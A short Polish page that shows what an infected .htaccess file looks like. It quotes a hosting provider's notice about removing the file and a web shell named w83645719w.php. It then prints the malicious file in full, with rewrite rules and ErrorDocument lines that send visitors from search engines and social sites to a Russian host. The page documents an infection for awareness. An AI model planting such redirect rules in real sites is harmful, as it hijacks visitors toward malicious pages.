Infekcje

Tak wygląda zainfekowany plik .htaccess:



"z Pańsiego konta zostały usunięte znalezione szkodliwe pliki, które znajdowały się w katalogu głównym, by to plik .htaccess odpowiedzialny za przekierowania, aktualni może Pan zobaczyć ten plik pod nazwą niewykonywalną htaccess_off jak i plik ze skryptem Web Shell, który widniał pod nazwą w83645719w.php. Aktualnie nie powinny subdomeny być przekierowywane."

Dział Techniczny





_________________________________________________________________________________________________

wirus:  htaccess_off

                                                                                                                                                                                                                                               
                                                                                                                        <IfModule mod_rewrite.c>                                                                                                                       
                                                                                                                        RewriteEngine On                                                                                                                       
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)                                                                                                                       
                                                                                                                        RewriteRule ^(.*)$ http://icon-shortcut.ru/access/index.php [R=301,L]                                                                                                                       
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)                                                                                                                       
                                                                                                                        RewriteRule ^(.*)$ http://icon-shortcut.ru/access/index.php [R=301,L]                                                                                                                       
                                                                                                                        </IfModule>                                                                                                                       
                                                                                                                                                                                                                                               



                                                                                                                                                                                                                                               
                                                                                                                        ErrorDocument 400 http://icon-shortcut.ru/access/index.php                                                                                                                       
                                                                                                                        ErrorDocument 401 http://icon-shortcut.ru/access/index.php                                                                                                                       
                                                                                                                        ErrorDocument 403 http://icon-shortcut.ru/access/index.php                                                                                                                       
                                                                                                                        ErrorDocument 404 http://icon-shortcut.ru/access/index.php                                                                                                                       
                                                                                                                        ErrorDocument 500 http://icon-shortcut.ru/access/index.php